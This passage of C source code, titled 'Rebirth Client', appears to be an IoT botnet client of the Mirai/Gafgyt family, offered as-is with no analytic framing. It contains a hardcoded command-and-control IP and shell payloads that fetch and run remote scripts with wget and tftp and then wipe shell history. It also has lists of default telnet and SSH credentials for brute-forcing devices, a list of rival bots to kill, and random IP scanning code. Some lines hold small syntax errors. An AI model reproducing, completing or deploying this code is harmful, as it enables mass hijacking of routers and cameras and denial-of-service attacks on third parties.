[c]Rebirth Client

1. #include <stdlib.h>
2. #include <stdarg.h>
3. #include <stdio.h>
4. #include <sys/socket.h>
5. #include <sys/types.h>
6. #include <netinet/in.h>
7. #include <arpa/inet.h>
8. #include <netdb.h>
9. #include <signal.h>
10. #include <strings.h>
11. #include <sys/utsname.h>
12. #include <unistd.h>
13. #include <fcntl.h>
14. #include <errno.h>
15. #include <netinet/ip.h>
16. #include <netinet/udp.h>
17. #include <netinet/tcp.h>
18. #include <sys/wait.h>
19. #include <sys/ioctl.h>
20. #include <net/if.h>
21. #include <time.h>
22. #include <dirent.h>
23. #include <limits.h>
24. #include <sys/stat.h>
25. #include <sys/time.h>
26. #include <string.h>
27. #include <stdint.h>
28. #include <stdio.h>
29. #include <sys/param.h>
30. #include <sys/time.h>
31.  
32. #define PR_SET_NAME 15
33. #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *))
34. #define PAD_RIGHT 1
35. #define PAD_ZERO 2
36. #define PRINT_BUF_LEN 12
37. #define CMD_IAC 255
38. #define CMD_WILL 251
39. #define CMD_WONT 252
40. #define CMD_DO 253
41. #define CMD_DONT 254
42. #define OPT_SGA 3
43. #define SOCKBUF_SIZE 1024
44.  
45.  
46.  
47. char *getBuild() {
48. #if defined(__x86_64__) || defined(_M_X64)
49. return "x86_64";
50. #elif defined(__i386) || defined(_M_IX86)
51. return "x86_32";
52. #elif defined(__ARM_ARCH_4T__) || defined(__TARGET_ARM_4T)
53. return "ARM-4";
54. #elif defined(__ARM_ARCH_5_) || defined(__ARM_ARCH_5E_)
55. return "ARM-5"
56. #elif defined(__ARM_ARCH_6_) || defined(__ARM_ARCH_6T2_)
57. return "ARM-6";
58. #elif defined(_mips__mips) || defined(__mips) || defined(__MIPS_) || defined(_mips)
59. return "MIPS";
60. #elif defined(__sh__)
61. return "SUPERH";
62. #elif defined(__powerpc) || defined(__powerpc_) || defined(_ppc_) || defined(__PPC__) || defined(_ARCH_PPC)
63. return "POWERPC";
64. #else
65. return "UNKNOWN";
66. #endif
67. }
68. const char *useragents[] = {
69. "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
70. "Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1",
71. "Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)",
72. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4",
73. "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201",
74. "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911",
75. "Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2",
76. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)",
77. "Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285",
78. "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7",
79. "Mozilla/5.0 (PLAYSTATION 3; 3.55)",
80. "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2",
81. "wii libnup/1.0",
82. "Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
83. "PSP (PlayStation Portable); 2.00",
84. "Bunjalloo/0.7.6(Nintendo DS;U;en)",
85. "Doris/1.15 [en] (Symbian)",
86. "BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
87. "BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100",
88. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16",
89. "Opera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01",
90. "Mozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62",
91. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
92. "Mozilla/5.0 (Linux; Android 4.4.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.89 Mobile Safari/537.36",
93. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.39 Safari/525.19",
94. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; chromeframe/11.0.696.57)",
95. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; uZardWeb/1.0; Server_JP)",
96. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
97. "SonyEricssonW800i/R1BD001/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1",
98. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.0; FDM; MSIECrawler; Media Center PC 5.0)",
99. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20110517 Firefox/5.0 Fennec/5.0",
100. "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts)",
101. "MOT-V300/0B.09.19R MIB/2.2 Profile/MIDP-2.0 Configuration/CLDC-1.0",
102. "Mozilla/5.0 (Android; Linux armv7l; rv:9.0) Gecko/20111216 Firefox/9.0 Fennec/9.0",
103. "Mozilla/5.0 (compatible; Teleca Q7; Brew 3.1.5; U; en) 480X800 LGE VX11000",
104. "MOT-L7/08.B7.ACR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1"
105. };
106. struct telstate_t {
107. int fd;
108. unsigned int ip;
109. unsigned char state;
110. unsigned char complete;
111. unsigned char usernameInd; /* username */
112. unsigned char passwordInd; /* password */
113. unsigned char tempDirInd; /* tempdir */
114. unsigned int tTimeout; /* totalTimeout */
115. unsigned short bufUsed;
116. char *sockbuf;
117. };
118. int initConnection();
119. void makeRandomStr(unsigned char *buf, int length);
120. int sockprintf(int sock, char *formatStr, ...);
121. char *inet_ntoa(struct in_addr in);
122. int mainCommSock = 0, currentServer = -1;
123. uint32_t *pids;
124. uint32_t scanPid;
125. uint64_t numpids = 0;
126. struct in_addr ourIP;
127. unsigned char macAddress[6] = {0};
128.  
129.  
130. unsigned char *commServer[] = { "104.168.170.60:443" };
131. char *Busybox_Payload = "cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 104.168.170.60/bin.sh;chmod 777;sh bin.sh;busybox tftp -g 104.168.170.60 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 104.168.170.60 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history;cd /tmp || cd /var/system || cd /mnt || cd /lib;rm -f /tmp/ || /var/run/ || /var/system/ || /mnt/ || /lib/*;cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;busybox wget 104.168.170.60/bins.sh;chmod 777;sh bins.sh;busybox tftp -g 104.168.170.60 -r tftp1.sh;chmod 777 *;sh tftp1.sh;busybox tftp -g 104.168.170.60 -r tftp2.sh;chmod 777 *;sh tftp2.sh;rm -rf *sh;history -c;history -w;rm -rf ~/.bash_history"; //Telnet Scanner Must implement Busybox.
132. char *Payload = "cd /tmp/;wget http://104.168.170.60/bins.sh;sh bins.sh;rm -rf bins.sh;cd /tmp/;wget http://104.168.170.60/bins.sh;sh bins.sh;rm -rf bins.sh"; //Normal Payload Without busybox Implemented.
133.  
134. char *Python_Temp_Directory = "/etc/.../"; //Temp directory The Python Scanner is Downloaded to and executed from.
135. char *Python_File_Location = "http://104.168.170.60/scan.py"; //Payload To Download The Python Scanner.
136.  
137. char *BINS_HOST_IP = "104.168.170.60";
138. char *BIN = "BIN.sh";
139. char *TFTP1 = "tftp1.sh";
140. char *TFTP2 = "tftp2.sh";
141. char *FTP1 = "ftp1.sh";
142.  
143. char *BINS1 = "ntpd"; //MIPS
144. char *BINS2 = "sshd"; //MIPSEL
145. char *BINS3 = "openssh"; //SH4
146. char *BINS4 = "bash"; //X86_64
147. char *BINS5 = "tftp"; //ARMV6L
148. char *BINS6 = "wget"; //I686
149. char *BINS7 = "cron"; //POWERPC
150. char *BINS8 = "ftp"; //I586
151. char *BINS9 = "tftp"; //M68K
152. char *BINS10 = "sh"; //SPARC
153. char *BINS11 = "nut"; //ARMV4L
154. char *BINS12 = "apache2"; //ARMV5L
155. char *BINS13 = "telnetd"; //POWERPC440FP
156.  
157.  
158. char *Telnet_Usernames[] = {
159.  
160. "telnet\0", //telnet:telnet
161. "root\0", //root:root
162. "root\0", //root:1234
163. "root\0", //root:12345
164. "root\0", //root:oelinux123
165. "admin\0", //admin:admin
166. "root\0", //root:Zte521
167. "root\0", //root:vizxv
168. "admin\0", //admin:1234
169. "guest\0"
170.  
171. };
172.  
173.  
174. char *Telnet_Passwords[] = {
175.  
176. "telnet\0", //telnet:telnet
177. "root\0", //root:root
178. "1234\0", //root:1234
179. "12345\0", //root:12345
180. "oelinux123\0", //root:oelinux123
181. "admin\0", //root:Zte521
182. "vizxv\0", //root:vizxv
183. "1234\0", //admin:1234
184. };
185.  
186.  
187.  
188.  
189.  
190.  
191.  
192.  
193. char *Mirai_Usernames[] = {
194.  
195. "root\0", //root:xc3511
196. "root\0", //root:vizxv
197. "root\0", //root:admin
198. "admin\0", //admin:admin
199. "root\0", //root:888888
200. "root\0", //root:xmhdipc
201. "root\0", //root:default
202. "root\0", //root:juantech
203. "root\0", //root:123456
204. "root\0", //root:54321
205. "support\0", //support:support
206. "root\0", //root:(none)
207. "admin\0", //admin:password
208. "root\0", //root:root
209. "root\0", //root:12345
210. "user\0", //user:user
211. "admin\0", //admin:(none)
212. "root\0", //root:pass
213. "admin\0", //admin:admin1234
214. "root\0", //root:1111
215. "admin\0", //admin:smcadmin
216. "admin\0", //admin:1111
217. "root\0", //root:666666
218. "root\0", //root:password
219. "root\0", //root:1234
220. "root\0", //root:klv123
221. "Administrator\0", //Administrator:admin
222. "service\0", //service:service
223. "supervisor\0", //supervisor:supervisor
224. "guest\0", //guest:guest
225. "guest\0", //guest:12345
226. "guest\0", //guest:12345
227. "admin1\0", //admin1:password
228. "administrator\0", //administrator:1234
229. "666666\0", //666666:666666
230. "888888\0", //888888:888888
231. "ubnt\0", //ubnt:ubnt
232. "klv1234\0", //root:klv1234
233. "Zte521\0", //root:Zte521
234. "hi3518\0", //root:hi3518
235. "jvbzd\0", //root:jvbzd
236. "anko\0", //root:anko
237. "zlxx\0", //root:zlxx
238. "7ujMko0vizxv\0", //root:7ujMko0vizxv
239. "7ujMko0admin\0", //root:7ujMko0admin
240. "system\0", //root:system
241. "ikwb\0", //root:ikwb
242. "dreambox\0", //root:dreambox
243. "user\0", //root:user
244. "realtek\0", //root:realtek
245. "00000000\0", //root:00000000
246. "1111111\0", //admin:1111111
247. "1234\0", //admin:1234
248. "12345\0", //admin:12345
249. "54321\0", //admin:54321
250. "123456\0", //admin:123456
251. "7ujMko0admin\0", //admin:7ujMko0admin
252. "1234\0", //admin:1234
253. "pass\0", //admin:pass
254. "meinsm\0", //admin:meinsm
255. "tech\0", //tech:tech
256. "fucker\0", //mother:fucker
257. };
258.  
259. char *Mirai_Passwords[] = {
260.  
261. "xc3511\0", //root:xc3511
262. "vizxv\0", //root:vizxv
263. "admin\0", //root:admin
264. "admin\0", //admin:admin
265. "888888\0", //root:888888
266. "xmhdipc\0", //root:xmhdipc
267. "default\0", //root:default
268. "juantech\0", //root:juantech
269. "123456\0", //root:123456
270. "54321\0", //root:54321
271. "support\0", //support:support
272. "\0", //root:(none)
273. "password\0", //admin:password
274. "root\0", //root:root
275. "12345\0", //root:12345
276. "user\0", //user:user
277. "\0", //admin:(none)
278. "pass\0", //root:pass
279. "admin1234\0", //admin:admin1234
280. "1111\0", //root:1111
281. "smcadmin\0", //admin:smcadmin
282. "1111\0", //admin:1111
283. "666666\0", //root:666666
284. "password\0", //root:password
285. "1234\0", //root:1234
286. "klv123\0", //root:klv123
287. "admin\0", //Administrator:admin
288. "service\0", //service:service
289. "supervisor\0", //supervisor:supervisor
290. "guest\0", //guest:guest
291. "12345\0", //guest:12345
292. "12345\0", //guest:12345
293. "password\0", //admin1:password
294. "1234\0", //administrator:1234
295. "666666\0", //666666:666666
296. "888888\0", //888888:888888
297. "ubnt\0", //ubnt:ubnt
298. "klv1234\0", //root:klv1234
299. "Zte521\0", //root:Zte521
300. "hi3518\0", //root:hi3518
301. "jvbzd\0", //root:jvbzd
302. "anko\0", //root:anko
303. "zlxx\0", //root:zlxx
304. "7ujMko0vizxv\0", //root:7ujMko0vizxv
305. "7ujMko0admin\0", //root:7ujMko0admin
306. "system\0", //root:system
307. "ikwb\0", //root:ikwb
308. "dreambox\0", //root:dreambox
309. "user\0", //root:user
310. "realtek\0", //root:realtek
311. "00000000\0", //root:00000000
312. "1111111\0", //admin:1111111
313. "1234\0", //admin:1234
314. "12345\0", //admin:12345
315. "54321\0", //admin:54321
316. "123456\0", //admin:123456
317. "7ujMko0admin\0", //admin:7ujMko0admin
318. "1234\0", //admin:1234
319. "pass\0", //admin:pass
320. "meinsm\0", //admin:meinsm
321. "tech\0", //tech:tech
322. "fucker\0", //mother:fucker
323.  
324. };
325. char *SSH_Usernames[] = {
326. "root\0", //root:root
327. "admin\0", //admin:admin
328. "admin\0", //admin:1234
329. "root\0", //root:1234
330. "ubnt\0", //ubnt:ubnt
331. };
332. char *SSH_Passwords[] = {
333. "root\0", //root:root
334. "admin\0", //admin:admin
335. "1234\0", //admin:1234
336. "1234\0", //root:1234
337. "ubnt\0", //ubnt:ubnt
338. };
339.  
340. char *Bot_Killer_Binarys[] = {
341. "mips",
342. "mipsel",
343. "sh4",
344. "x86",
345. "i686",
346. "ppc",
347. "i586",
348. "i586",
349. "jack*",
350. "hack*",
351. "arm*"
352. "tel*"
353. "b1",
354. "b2",
355. "b3",
356. "b4",
357. "b5",
358. "b6",
359. "b7",
360. "b8",
361. "b9",
362. "lol*",
363. "busybox*",
364. "badbox*",
365. "DFhxdhdf",
366. "dvrHelper",
367. "FDFDHFC",
368. "FEUB",
369. "FTUdftui",
370. "GHfjfgvj",
371. "jhUOH",
372. "JIPJIPJj",
373. "JIPJuipjh",
374. "kmyx86_64",
375. "lolmipsel",
376. "mips",
377. "mipsel",
378. "RYrydry",
379. "TwoFace*",
380. "UYyuyioy",
381. "wget",
382. "x86_64",
383. "XDzdfxzf",
384. "xx*",
385. "sh",
386. "1",
387. "2",
388. "3",
389. "4",
390. "5",
391. "6",
392. "7",
393. "8",
394. "9",
395. "10",
396. "11",
397. "12",
398. "13",
399. "14",
400. "15",
401. "16",
402. "17",
403. "18",
404. "19",
405. "20",
406. "busybox",
407. "badbox",
408. "Mirai*",
409. "mirai*",
410. "cunty*"
411. "IoT*"
412. };
413.  
414.  
415. int PythonRanges[] = {
416. 5.78,
417. 49.150,
418. 91.98,
419. 91.99,
420. 101.108,
421. 101.109,
422. 119.93,
423. 122.3,
424. 122.52,
425. 122.54,
426. 124.104,
427. 124.105,
428. 124.106,
429. 124.107,
430. 125.25,
431. 125.26,
432. 125.27,
433. 125.2
434. };
435.  
436.  
437. char *Temp_Directorys[] = {"/tmp/*", "/var/*", "/var/run/*", "/var/tmp/*", (char*) 0};
438. char *advances[] = {":", "user", "ogin", "name", "pass", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
439. char *fails[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
440. char *successes[] = {"busybox", "$", "#", "shell", "dvrdvs", "mdm9625", "9615-cdp", "F600", "F660", "F609", "BCM", (char*)0};
441. char *advances2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "busybox", "$", "#", (char*)0};
442.  
443. #define PHI 0x9e3779b9
444. static uint32_t Q[4096], c = 362436;
445. void init_rand(uint32_t x) {
446. int i;
447. Q[0] = x;
448. Q[1] = x + PHI;
449. Q[2] = x + PHI + PHI;
450. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
451. }
452. uint32_t rand_cmwc(void) {
453. uint64_t t, a = 18782LL;
454. static uint32_t i = 4095;
455. uint32_t x, r = 0xfffffffe;
456. i = (i + 1) & 4095;
457. t = a * Q[i] + c;
458. c = (uint32_t)(t >> 32);
459. x = t + c;
460. if (x < c) {
461. x++;
462. c++;
463. }
464. return (Q[i] = r - x);
465. }
466. int contains_string(char* buffer, char** strings) {
467. int num_strings = 0, i = 0;
468. for(num_strings = 0; strings[++num_strings] != 0; );
469. for(i = 0; i < num_strings; i++) {
470. if(strcasestr(buffer, strings[i])) {
471. return 1;
472. }
473. }
474. return 0;
475. }
476. int contains_success(char* buffer) {
477. return contains_string(buffer, successes);
478. }
479. int contains_fail(char* buffer) {
480. return contains_string(buffer, fails);
481. }
482. int contains_response(char* buffer) {
483. return contains_success(buffer) || contains_fail(buffer);
484. }
485. int read_with_timeout(int fd, int timeout_usec, char* buffer, int buf_size) {
486. fd_set read_set;
487. struct timeval tv;
488. tv.tv_sec = 0;
489. tv.tv_usec = timeout_usec;
490. FD_ZERO(&read_set);
491. FD_SET(fd, &read_set);
492. if (select(fd+1, &read_set, NULL, NULL, &tv) < 1)
493. return 0;
494. return recv(fd, buffer, buf_size, 0);
495. }
496. int read_until_response(int fd, int timeout_usec, char* buffer, int buf_size, char** strings) {
497. int num_bytes, i;
498. memset(buffer, 0, buf_size);
499. num_bytes = read_with_timeout(fd, timeout_usec, buffer, buf_size);
500. if(buffer[0] == 0xFF) {
501. negotiate(fd, buffer, 3);
502. }
503.  
504. if(contains_string(buffer, strings)) {
505. return 1;
506. }
507.  
508. return 0;
509. }
510. const char* get_telstate_host(struct telstate_t* telstate) { // get host
511. struct in_addr in_addr_ip;
512. in_addr_ip.s_addr = telstate->ip;
513. return inet_ntoa(in_addr_ip);
514. }
515. void advance_telstate(struct telstate_t* telstate, int new_state) { // advance
516. if(new_state == 0) {
517. close(telstate->fd);
518. }
519. telstate->tTimeout = 0;
520. telstate->state = new_state;
521. memset((telstate->sockbuf), 0, SOCKBUF_SIZE);
522. }
523. void reset_telstate(struct telstate_t* telstate) { // reset
524. advance_telstate(telstate, 0);
525. telstate->complete = 1;
526. }
527. void trim(char *str) {
528. int i;
529. int begin = 0;
530. int end = strlen(str) - 1;
531.  
532. while (isspace(str[begin])) begin++;
533.  
534. while ((end >= begin) && isspace(str[end])) end--;
535. for (i = begin; i <= end; i++) str[i - begin] = str[i];
536.  
537. str[i - begin] = '\0';
538. }
539. static void printchar(unsigned char **str, int c) {
540. if (str) {
541. **str = c;
542. ++(*str);
543. }
544. else (void)write(1, &c, 1);
545. }
546. static int prints(unsigned char **out, const unsigned char *string, int width, int pad) {
547. register int pc = 0, padchar = ' ';
548. if (width > 0) {
549. register int len = 0;
550. register const unsigned char *ptr;
551. for (ptr = string; *ptr; ++ptr) ++len;
552. if (len >= width) width = 0;
553. else width -= len;
554. if (pad & PAD_ZERO) padchar = '0';
555. }
556. if (!(pad & PAD_RIGHT)) {
557. for ( ; width > 0; --width) {
558. printchar (out, padchar);
559. ++pc;
560. }
561. }
562. for ( ; *string ; ++string) {
563. printchar (out, *string);
564. ++pc;
565. }
566. for ( ; width > 0; --width) {
567. printchar (out, padchar);
568. ++pc;
569. }
570. return pc;
571. }
572. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase) {
573. unsigned char print_buf[PRINT_BUF_LEN];
574. register unsigned char *s;
575. register int t, neg = 0, pc = 0;
576. register unsigned int u = i;
577. if (i == 0) {
578. print_buf[0] = '0';
579. print_buf[1] = '\0';
580. return prints (out, print_buf, width, pad);
581. }
582. if (sg && b == 10 && i < 0) {
583. neg = 1;
584. u = -i;
585. }
586.  
587. s = print_buf + PRINT_BUF_LEN-1;
588. *s = '\0';
589. while (u) {
590. t = u % b;
591. if( t >= 10 )
592. t += letbase - '0' - 10;
593. *--s = t + '0';
594. u /= b;
595. }
596. if (neg) {
597. if( width && (pad & PAD_ZERO) ) {
598. printchar (out, '-');
599. ++pc;
600. --width;
601. }
602. else {
603. *--s = '-';
604. }
605. }
606.  
607. return pc + prints (out, s, width, pad);
608. }
609. static int print(unsigned char **out, const unsigned char *format, va_list args ) {
610. register int width, pad;
611. register int pc = 0;
612. unsigned char scr[2];
613. for (; *format != 0; ++format) {
614. if (*format == '%') {
615. ++format;
616. width = pad = 0;
617. if (*format == '\0') break;
618. if (*format == '%') goto out;
619. if (*format == '-') {
620. ++format;
621. pad = PAD_RIGHT;
622. }
623. while (*format == '0') {
624. ++format;
625. pad |= PAD_ZERO;
626. }
627. for ( ; *format >= '0' && *format <= '9'; ++format) {
628. width *= 10;
629. width += *format - '0';
630. }
631. if( *format == 's' ) {
632. register char *s = (char *)va_arg( args, int );
633. pc += prints (out, s?s:"(null)", width, pad);
634. continue;
635. }
636. if( *format == 'd' ) {
637. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
638. continue;
639. }
640. if( *format == 'x' ) {
641. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
642. continue;
643. }
644. if( *format == 'X' ) {
645. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
646. continue;
647. }
648. if( *format == 'u' ) {
649. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
650. continue;
651. }
652. if( *format == 'c' ) {
653. scr[0] = (unsigned char)va_arg( args, int );
654. scr[1] = '\0';
655. pc += prints (out, scr, width, pad);
656. continue;
657. }
658. }
659. else {
660. out:
661. printchar (out, *format);
662. ++pc;
663. }
664. }
665. if (out) **out = '\0';
666. va_end( args );
667. return pc;
668. }
669. int zprintf(const unsigned char *format, ...) {
670. va_list args;
671. va_start( args, format );
672. return print( 0, format, args );
673. }
674. int szprintf(unsigned char *out, const unsigned char *format, ...) {
675. va_list args;
676. va_start( args, format );
677. return print( &out, format, args );
678. }
679. int sockprintf(int sock, char *formatStr, ...) {
680. unsigned char *textBuffer = malloc(2048);
681. memset(textBuffer, 0, 2048);
682. char *orig = textBuffer;
683. va_list args;
684. va_start(args, formatStr);
685. print(&textBuffer, formatStr, args);
686. va_end(args);
687. orig[strlen(orig)] = '\n';
688. zprintf("%s\n", orig);
689. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
690. free(orig);
691. return q;
692. }
693. int wildString(const unsigned char* pattern, const unsigned char* string) {
694. switch(*pattern) {
695. case '\0': return *string;
696. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
697. case '?': return !(*string && !wildString(pattern+1, string+1));
698. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
699. }
700. }
701. int getHost(unsigned char *toGet, struct in_addr *i) {
702. struct hostent *h;
703. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
704. return 0;
705. }
706. void makeRandomStr(unsigned char *buf, int length) {
707. int i = 0;
708. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
709. }
710. int recvLine(int socket, unsigned char *buf, int bufsize) {
711. memset(buf, 0, bufsize);
712. fd_set myset;
713. struct timeval tv;
714. tv.tv_sec = 30;
715. tv.tv_usec = 0;
716. FD_ZERO(&myset);
717. FD_SET(socket, &myset);
718. int selectRtn, retryCount;
719. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
720. while(retryCount < 10) {
721. tv.tv_sec = 30;
722. tv.tv_usec = 0;
723. FD_ZERO(&myset);
724. FD_SET(socket, &myset);
725. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
726. retryCount++;
727. continue;
728. }
729. break;
730. }
731. }
732. unsigned char tmpchr;
733. unsigned char *cp;
734. int count = 0;
735. cp = buf;
736. while(bufsize-- > 1) {
737. if(recv(mainCommSock, &tmpchr, 1, 0) != 1) {
738. *cp = 0x00;
739. return -1;
740. }
741. *cp++ = tmpchr;
742. if(tmpchr == '\n') break;
743. count++;
744. }
745. *cp = 0x00;
746. return count;
747. }
748. int connectTimeout(int fd, char *host, int port, int timeout) {
749. struct sockaddr_in dest_addr;
750. fd_set myset;
751. struct timeval tv;
752. socklen_t lon;
753. int valopt;
754. long arg = fcntl(fd, F_GETFL, NULL);
755. arg |= O_NONBLOCK;
756. fcntl(fd, F_SETFL, arg);
757. dest_addr.sin_family = AF_INET;
758. dest_addr.sin_port = htons(port);
759. if(getHost(host, &dest_addr.sin_addr)) return 0;
760. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
761. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
762. if (res < 0) {
763. if (errno == EINPROGRESS) {
764. tv.tv_sec = timeout;
765. tv.tv_usec = 0;
766. FD_ZERO(&myset);
767. FD_SET(fd, &myset);
768. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
769. lon = sizeof(int);
770. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
771. if (valopt) return 0;
772. }
773. else return 0;
774. }
775. else return 0;
776. }
777. arg = fcntl(fd, F_GETFL, NULL);
778. arg &= (~O_NONBLOCK);
779. fcntl(fd, F_SETFL, arg);
780. return 1;
781. }
782. int listFork() {
783. uint32_t parent, *newpids, i;
784. parent = fork();
785. if (parent <= 0) return parent;
786. numpids++;
787. newpids = (uint32_t*)malloc((numpids + 1) * 4);
788. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
789. newpids[numpids - 1] = parent;
790. free(pids);
791. pids = newpids;
792. return parent;
793. }
794. int negotiate(int sock, unsigned char *buf, int len) {
795. unsigned char c;
796. switch (buf[1]) {
797. case CMD_IAC: return 0;
798. case CMD_WILL:
799. case CMD_WONT:
800. case CMD_DO:
801. case CMD_DONT:
802. c = CMD_IAC;
803. send(sock, &c, 1, MSG_NOSIGNAL);
804. if (CMD_WONT == buf[1]) c = CMD_DONT;
805. else if (CMD_DONT == buf[1]) c = CMD_WONT;
806. else if (OPT_SGA == buf[1]) c = (buf[1] == CMD_DO ? CMD_WILL : CMD_DO);
807. else c = (buf[1] == CMD_DO ? CMD_WONT : CMD_DONT);
808. send(sock, &c, 1, MSG_NOSIGNAL);
809. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
810. break;
811. default:
812. break;
813. }
814.  
815. return 0;
816. }
817. int matchPrompt(char *bufStr) {
818. char *prompts = ":>%$#\0";
819. int bufLen = strlen(bufStr);
820. int i, q = 0;
821. for(i = 0; i < strlen(prompts); i++) {
822. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
823. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
824. }
825. return 0;
826. }
827. in_addr_t getRandomPublicIP() {
828. static uint8_t ipState[4] = {0};
829. ipState[0] = rand() % 223;
830. ipState[1] = rand() % 255;
831. ipState[2] = rand() % 255;
832. ipState[3] = rand() % 255;
833. while(
834. (ipState[0] == 0) ||
835. (ipState[0] == 10) ||
836. (ipState[0] == 100 && (ipState[1] >= 64 && ipState[1] <= 127)) ||
837. (ipState[0] == 127) ||
838. (ipState[0] == 169 && ipState[1] == 254) ||
839. (ipState[0] == 172 && (ipState[1] <= 16 && ipState[1] <= 31)) ||
840. (ipState[0] == 192 && ipState[1] == 0 && ipState[2] == 2) ||
841. (ipState[0] == 192 && ipState[1] == 88 && ipState[2] == 99) ||
842. (ipState[0] == 192 && ipState[1] == 168) ||
843. (ipState[0] == 198 && (ipState[1] == 18 || ipState[1] == 19)) ||
844. (ipState[0] == 198 && ipState[1] == 51 && ipState[2] == 100) ||
845. (ipState[0] == 203 && ipState[1] == 0 && ipState[2] == 113) ||
846. (ipState[0] >= 224)
847. )
848. {
849. ipState[0] = rand() % 223;
850. ipState[1] = rand() % 255;
851. ipState[2] = rand() % 255;
852. ipState[3] = rand() % 255;
853. }
854. char ip[16] = {0};
855. szprintf(ip, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);
856. return inet_addr(ip);
857. }
858.  
859. in_addr_t MiraiIPRanges()
860. {
861. static uint8_t ipState[4] = {0};
862. ipState[0] = rand() % 223;
863. ipState[1] = rand() % 255;
864. ipState[2] = rand() % 255;
865. ipState[3] = rand() % 255;
866. while(
867. (ipState[0] == 127) || // 127.0.0.0/8 - Loopback
868. (ipState[0] == 0) || // 0.0.0.0/8 - Invalid address space
869. (ipState[0] == 3) || // 3.0.0.0/8 - General Electric Company
870. (ipState[0] == 15 || ipState[0] == 16) || // 15.0.0.0/7 - Hewlett-Packard Company
871. (ipState[0] == 56) || // 56.0.0.0/8 - US Postal Service
872. (ipState[0] == 10) || // 10.0.0.0/8 - Internal network
873. (ipState[0] == 192 && ipState[1] == 168) || // 192.168.0.0/16 - Internal network
874. (ipState[0] == 172 && ipState[1] >= 16 && ipState[1] < 32) || // 172.16.0.0/14 - Internal network
